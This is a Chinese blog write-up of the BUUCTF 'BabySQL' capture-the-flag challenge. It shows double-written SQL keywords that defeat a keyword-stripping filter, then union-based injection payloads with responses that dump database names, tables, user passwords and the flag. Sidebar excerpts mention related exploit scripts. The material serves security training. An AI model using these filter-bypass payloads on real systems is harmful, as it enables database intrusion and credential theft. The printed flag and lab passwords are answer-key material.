【BUUCTF】 [极客大挑战2019] BabySQL —— 清晰易懂总结好的 Writeup

最新推荐文章于 2024-08-17 17:39:29 发布
最新推荐文章于 2024-08-17 17:39:29 发布
阅读量995 收藏 5
点赞数 3
分类专栏: SQL 文章标签: sql mysql ctf writeup 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vanarrow/article/details/108226003
版权

【BUUCTF】 [极客大挑战2019] BabySQL Writeup

0x00 考点

sql 注入 双写绕过

replace函数,找到union和select等替换为空

需要绕过的双写,单词中间拆开,分两半,里面藏一个完整的:

union 
ununionion

select
seselectlect

from
frfromom

where
whwhereere

information
infoorrmation
(过滤了or)

order
oorrder
(过滤了or)

by
bbyy

常见URL编码

%20
空格

%23
#

%27
'

0x01 解题

?username=admin&password=pwd %27 or 1=1 %23

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1=1 ‘’ at line 1

没有or,只有1=1,or被过滤了

?username=admin&password=pwd %27 oorr 1=1 %23

Hello admin!
Your password is ‘09e6f2bc1ee446ef66b91bf09f58d0d4’

by也被过滤了

?username=admin&password=pwd %27 oorrder bbyy 3 %23

NO,Wrong username password!!!

?username=admin&password=pwd %27 oorrder bbyy 4 %23

Unknown column ‘4’ in ‘order clause’

有三个字段

?username=admin&password=pwd ' union select 1 #

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1 ‘’ at line 1

只讲了1# ,说明被检测到了union和select

用双写绕过

?username=admin&password=pwd ' ununionion seselectlect 1 #

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘’’ at line 1

无论hackbar,还是网址框,#在这里必须用URL编码成%23,否则不行!
(不是很理解,以前好像在url框#也ok???)

?username=admin&password=pwd %27 ununionion seselectlect 1 %23

The used SELECT statements have a different number of columns

列数不对

?username=admin&password=pwd %27 ununionion seselectlect 1,2,3 %23

Hello 2!
Your password is ‘3’

?username=admin&password=pwd %27 ununionion seselectlect 1,2,version() %23

Hello 2!

Your password is ‘10.3.18-MariaDB’

?username=admin&password=pwd %27 ununionion seselectlect 1,2,database() %23

Hello 2!
Your password is ‘geek’

爆库

?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(schema_name)frfromom
(infoorrmation_schema.schemata) %23

Hello 2!
Your password is
‘information_schema,mysql,performance_schema,test,ctf,geek’

爆表

?username=admin&password=pwd %27 ununionion seselectlect 1,2,
group_concat(table_name)from(information_schema.tables)whwhereere table_schema="geek" %23

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘(infinfmationmation_schema.tables)where table_schema=“geek” #’’ at line 1

information被过滤了or

?username=admin&password=pwd %27 ununionion seselectlect 1,2,
group_concat(table_name)frfromom(infoorrmation_schema.tables)
whwhereere table_schema="geek" %23

Hello 2!

Your password is ‘b4bsql,geekuser’

?username=admin&password=pwd %27 ununionion seselectlect 1,2,
group_concat(table_name)frfromom(infoorrmation_schema.tables)
whwhereere table_schema="ctf" %23

Hello 2!
Your password is ‘Flag’

爆列

?username=admin&password=pwd %27 ununionion seselectlect 1,2,
group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere 
 table_name="Flag"%23

Hello 2!
Your password is ‘flag’

查ctf库的Flag表的flag列

?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag)%23

Hello 2!
Your password is ‘flag{d3a1f578-e00b-47d4-96b4-9535be15f9de}’

另一种

爆表

?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.columns whwhereere table_schema = 'geek' %23

Hello 2!
Your password is ‘b4bsql,b4bsql,b4bsql,geekuser,geekuser,geekuser’

?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(distinct table_name) frfromom infoorrmation_schema.columns whwhereere table_schema = 'geek' %23

Hello 2!
Your password is ‘b4bsql,geekuser’

爆列

?username=admin&password=pwd  ' ununionion seselectlect 1,2,group_concat(distinct column_name) frfromom infoorrmation_schema.columns whwhereere table_name = 'b4bsql'%23

Hello 2!
Your password is ‘id,username,password’

?username=admin&password=pwd  ' ununionion seselectlect 1,2,group_concat(distinct column_name) frfromom infoorrmation_schema.columns whwhereere table_name = 'b4bsql'%23

Hello 2!
Your password is ‘id,username,password’

?username=1&password=pwd' uniunionon selselectect 1,username,passwoorrd frfromom b4bsql %23

Hello cl4y!
Your password is ‘i_want_to_play_2077’

?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(id,0x3a,username,0x3a,passwoorrd) frofromm b4bsql %23

Hello 2!
Your password is
‘1:cl4y:i_want_to_play_2077,2:sql:sql_injection_is_so_fun,3:porn:do_you_know_pornhub,4:git:github_is_different_from_pornhub,5:Stop:you_found_flag_so_stop,6:badguy:i_told_you_to_stop,7:hacker:hack_by_cl4y,8:flag:flag{d3a1f578-e00b-47d4-96b4-9535be15f9de}’

你们这样一点都不可耐
关注
专栏目录
web-[极客挑战 2019]BabySQL
wojiushilsy的博客
05-13 330
题目要点题目内容解题1.查询数据库2.查询表名3.查询字段名4.查询数据 题目要点 双写绕过:waf将关键字替换为空。 题目内容 解题 1.查询数据库 /check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata%20%23 结果 Hello 2! Your.
[极客挑战 2019]RCE ME writeup + 无字母数字命令执行
ShenZ的博客
09-09 455
我以后再半夜开题目我就是【】 知识点 利用取反运算符绕过无字母数字正则表达式 取反之后基本上都是不可见字符 yu22x大佬的php脚本: <?php fwrite(STDOUT,'[+]your function: '); $system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN)); fwrite(STDOUT,'[+]your command: '); $command=str_replace(array("\r\n", "\
BUUCTF[极客挑战 2019]BabySQL
rumil的博客
06-25 2104
通过输入非0数字,能正常回显,0和字母不能正常回显,什么都没有显示。刚刚我们输入非0数字正常回显,0和字母不能正常的回显,猜测说明sql语句当中可能存在||运算符,只有输入非0数字,才会返回true,回显条件。可观察网页的源码信息,发现有check.php,猜测可能是登录界面时,输入账号和密码的跳转界面,提示信息。通过上面的过程我们不难发现,此时还存在过滤,from和where也被过滤,同理双写绕过。拿到该靶机,观察界面,存在登录说明存在可能SQL注入,根据题目也可得知存在SQL注入。
[极客挑战 2019]BabySQL1 详解以及思路(sql报错语句探究和跨库查询)
最新发布
2301_78981190的博客
08-17 209
观察报错信息,发现sql的报错信息有点不一样,确定它已经带入查询了,但报错信息中的or被吞了,所以怀疑是把or给过滤掉了,尝试双写后成功绕过(所以以下sql语句中如果语句报错就尝试双写解决,经过后面测试,过滤掉了or,select,by,union,from,where等)不要执着于错误的库(引以为戒本人在geek库中找了20min,在查询ctf库内容时忘记限定为ctf库导致仍然在geek库中查询,没能找到的悲剧(T▽T) )Flag表里只有flag列,所以跨库查询的语句这么写,成功找到flag。
buuctf-[极客挑战 2019]BabySQL(小宇特详解)
小宇的web博客
01-19 5200
buuctf-[极客挑战 2019]BabySQL(小宇特详解) 这里看题的话是一道SQL注入。 这里先尝试一下万能密码 这里发现它过滤了or(直接删除了or) 这里尝试进行双写 也就是oorr,这里删除了or后又重新构造了一个or 这里发现还是不行 这里先看一下双写union select 1 /check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23 这里发现不是报错,而是列数不对 当列数为3的时候对
[极客挑战 2019]BabySQL
wuuconix's blog
03-10 1018
[极客挑战 2019]BabySQL 考点: SQL关键字过滤 双拼绕过 这道题延续之前的LoveSQL 的解体方法,思路一模一样,但是这道题过滤了许多关键字。比如union or order by from select 等等 下面是我做题时总结出来的如何判断某关键字被过滤的办法,比如我们现在判断or 有没有被过滤 check.php?username=-1' ors ;%23&password=1234 我在or后加了个s ,不管有没有被过滤,都会报错,我们看看它的报错 Yo
[极客挑战 2019]FinalSQL
qi_SJQ_的博客
10-28 229
CTF-Web-[极客挑战 2019]FinalSQL 本来以为是登录框注入,看别人写的writeup才发现是那几个点击按钮的数字注入。根据提示知道是盲注。 异或'^'是一种数学运算,1^1=0 0^0=0 1^0=0,可以用来进行sql注入。 当两条件相同时(同真同假)结果为假,当两条件不同时(一真一假)结果为真。 从大佬那拿的exp:(较冗余,但更易理解) import requests import time host = "http://d7fe6340-f773-4d67-8be9-aefb
[极客挑战 2019] web题-LoveSQL
BROTHERYY的博客
07-07 317
复现环境:buuoj.cn 打开环境是一个登录框 sql注入,寻找闭合方式 登录成功,以为到这里就结束了,结果没这么简单,继续注入 tips:在url中输入的,所以不能用#,要用url编码%23 得到数据库名字 得到geek库里所有的表 继续注入得到字段名 dump出数据,结果这里发现geekuser里面没有数据,返回注入l0ve1ysq1这个表 flag{e503ad68-34dc-4b23-a315-046762d91322} 太长了截图不能截全,拉一下滑动条。 ...
[极客挑战 2019]LoveSQL
kuller_Yan的博客
05-19 332
[极客挑战 2019]LoveSQL-------wp from Kuller_yan 先打开靶场 看看题目 一看就和上一题 easysql 尝试万能钥匙1' or 1=1 # 看起来像md5解密,但是解密失败,继续查询字段,admin' order by 3 # admin' order by 4 # 到4的时候没有正常返回,然后用1' union select 1,2,3 # 回显点为2,3;然后用1' union select 1,database(), version() # 可以看到库名
CTFShow-周末大挑战parse-url篇Writeup
05-19
这篇Writeup主要涉及的是CTF(Capture The Flag)挑战中的Web安全领域,特别是URL解析漏洞的利用。CTF是一项网络安全竞赛,参与者通过解谜、破解密码等方式获取“国旗”(Flag),在这里指的是挑战的答案或关键信息...
BUUCTF [极客挑战 2019] BabySQL
Senimo
03-25 4037
BUUCTF [极客挑战 2019] BabySQL 启动靶机,打开环境: 尝试登陆: 因为前两次的题目BUUCTF 极客挑战 2019 EasySQL和均用万能密码登陆成功,再次尝试: /check.php ?username=admin' or '1'='1 &password=1 登陆失败,尝试注释掉password内容: /check.php ?username=adm...
BUUCTF[极客挑战2019]BabySQL
weixin_45253622的博客
05-07 354
SQL注入题型 输入 admin' 123 报错;发现存在注入点和闭合方式。 我们查看字段; ?username=admin&password=123' order by 3 从报错提示可以看出,过滤掉了or字段,所以万能密码不能使用,我们试试嵌套绕过;?username=admin&password=123' oorrder by 3 ...
BUUCTF:[极客挑战 2019]BabySQL
末初的CSDN博客
11-04 753
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]BabySQL 简单测试之后发现有些字符被过滤,初步判断这里的过滤是指特殊字符被替换为空,如下图所示 使用Burp进行SQL过滤字符的Fuzz 这些长度为726响应内容是Input your username and password的Fuzz结果是被过滤的字符 Trick 替换为空的关键字过滤使用双写关键字绕过 这里空格.
BUUCTF Web [极客挑战 2019]BabySQL
网安小趴菜
08-31 459
BUUCTF Web [极客挑战 2019]BabySQL
buuctf web [极客挑战 2019]BabySQL
m0_46412682的博客
07-16 1001
buuctf web [极客挑战 2019]BabySQL 开始的页面 随便输入用户名和密码 sql注入,先判断有多少字段 从图中可以看到select和union被过滤了,可以用双写selselectect uniunionon还有的是’单引号和#要编码变成%27 %23,先猜测4个字段,错误 3个字段,成功 ?username=admin&password=123%27ununionion selselectect 1,2,3%20%23 爆库 ?username=admin&
CTFShow周末大挑战:解析url获取flag Writeup
在本篇CTFShow的周末大挑战中,我们将深入解析六个关于URL编码和解析的网络安全题目,涉及GET和POST请求以及基础的漏洞利用技巧。每个关卡都旨在测试参赛者的编码理解、Web应用程序安全和基本的编码解码能力。 1. *...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值